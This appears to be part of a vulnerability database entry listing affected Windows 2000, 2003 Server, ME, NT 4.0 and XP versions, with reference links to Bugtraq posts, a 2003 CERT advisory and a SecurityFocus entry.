Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version enterprise

Microsoft>>Windows_2003_server >> Version enterprise_64-bit

Microsoft>>Windows_2003_server >> Version r2

Microsoft>>Windows_2003_server >> Version r2

Microsoft>>Windows_2003_server >> Version standard

Microsoft>>Windows_2003_server >> Version web

Microsoft>>Windows_me >> Version *

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

References

http://marc.info/?l=bugtraq&m=106666713812158&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=ntbugtraq&m=106632188709562&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.cert.org/advisories/CA-2003-27.html
Tags : third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/575892
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/8826
Tags : vdb-entry, x_refsource_BID